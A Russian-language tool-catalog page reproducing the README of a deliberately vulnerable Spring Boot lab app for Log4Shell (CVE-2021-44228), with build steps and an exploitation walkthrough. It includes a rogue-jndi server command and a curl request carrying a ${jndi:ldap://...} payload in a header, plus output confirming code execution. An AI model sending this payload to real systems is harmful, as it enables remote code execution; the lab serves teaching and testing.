Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228-poc — пример приложения log4shell (CVE-2021-44228) | Kitploit
Инструменты/GitHubGitHub/kadantte/cve-2021-44228-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubkadantte/cve-2021-44228-poc

CVE-2021-44228-poc

пример приложения log4shell (CVE-2021-44228)

Репозиторий
434 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Log4Shell пример уязвимого приложения (CVE-2021-44228)

Это почти точная копия/аналогичное уязвимое приложение из https://github.com/christophetd/log4shell-vulnerable-app

Основные отличия: использование Maven вместо Gradle и применение rogue-jndi.

Этот репозиторий содержит Maven-приложение Spring Boot, уязвимое к CVE-2021-44228, известному как Log4Shell.

Оно использует Log4j 2.6.1 и JDK версии 1.8.0_181.

Запуск приложения Spring Boot

Соберите и запустите Docker-приложение Spring Boot:

docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app

Эксплуатация

  1. git clone https://github.com/veracode-research/rogue-jndi
  2. cd rogue-jndi
  3. mvn package
  4. java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"

Откройте второй терминал.

  1. curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'

Где в обоих случаях 192.168.1.x — ваш IP-адрес.

ПРИМЕЧАНИЕ: не используйте localhost, укажите ваш фактический частный IP-адрес.

Теперь проверьте успешность RCE:

$ docker ps                                 
CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
04536dbd1dff   vulnerable-app   "java -jar demo-0.0.…"   2 minutes ago   Up 2 minutes   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   gallant_easley
$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
test_if_rce                              tomcat.8080.1707298461175346507

Как видите, файл test_if_rce существует. Это означает, что RCE прошло успешно.

ПРИМЕЧАНИЕ

Код и идеи были использованы из следующих репозиториев:

  • https://github.com/rayhan0x01/log4shell-vulnerable-app/tree/mod

  • https://www.lunasec.io/docs/blog/log4j-zero-day/

  • https://github.com/christophetd/log4shell-vulnerable-app

Скачать инструмент